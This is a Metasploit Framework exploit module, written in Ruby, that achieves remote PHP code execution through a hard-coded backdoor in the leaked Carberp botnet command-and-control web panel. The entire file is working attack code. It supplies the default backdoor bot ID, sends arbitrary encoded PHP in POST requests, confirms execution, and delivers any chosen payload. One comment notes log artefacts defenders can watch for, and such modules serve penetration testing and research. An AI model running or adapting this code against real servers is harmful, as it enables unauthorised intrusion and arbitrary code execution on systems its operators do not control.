##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
##
require 'msf/core'
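# Carberp Web Panel C2 backdoor module.
#
# Every request this module emits is an HTTP POST to TARGETURI carrying two
# form fields: 'id' (the backdoor bot ID from the BOTID option, whose default
# is the hard-coded value from the leaked panel source) and 'data' (the PHP to
# run, hex-dumped and then base64-encoded). Those two fields -- and the default
# BOTID value in particular -- are the observable artefacts a defender can key
# on when reviewing web-server logs for this backdoor.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and user-configurable options.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits backdoors that can be sighted all over the leaked
        source code of the Carberp botnet C2 Web Panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bwall(Brian Wallace) <bwallace[at]cylance.com>', # msf module
          'connection(Luis Santana) <hacktalkblog[at]gmail.com>', # exploit reporting
          'Steven K <xylitol[at]malwareint[d0t]com>' # discovery and reporting
        ],
      'References'     => [],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Keys'        => ['php'],
          'Space'       => 10000,
          'DisableNops' => true
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['carberp', {}]],
      'DisclosureDate' => 'Jun 28 2013',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The path to the backdoor, often just index.php", "/index.php"]),
        OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV'])
      ], self.class)
  end

  # Probes the endpoint by asking it to echo a random marker string.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker comes back in the
  #   response body, Unknown when no HTTP response was received at all, Safe
  #   otherwise.
  def check
    confirm_string = rand_text_alpha(8)
    res = http_send_command("echo '#{confirm_string}';")
    # No response (connection failure, timeout) says nothing about the target
    # either way, so do not report it as Safe.
    return Exploit::CheckCode::Unknown unless res

    # to_s guards against a nil body; a String body is unaffected.
    if res.body.to_s.include?(confirm_string)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Sends one PHP command to the backdoor endpoint.
  #
  # The request is a POST to TARGETURI with 'id' set to BOTID and 'data' set to
  # the base64 encoding of the command's hex dump (cmd.unpack('H*')).
  #
  # @param cmd [String] PHP source to send.
  # @return [Rex::Proto::Http::Response, nil] the HTTP response, or nil when
  #   none was received.
  def http_send_command(cmd)
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path.to_s),
      'vars_post' => {
        'id'   => datastore['BOTID'],
        'data' => Rex::Text.encode_base64(cmd.unpack('H*'))
      }
    )
  end

  # Delivers the selected PHP payload through the same backdoor request.
  def exploit
    http_send_command(payload.encoded)
  end
end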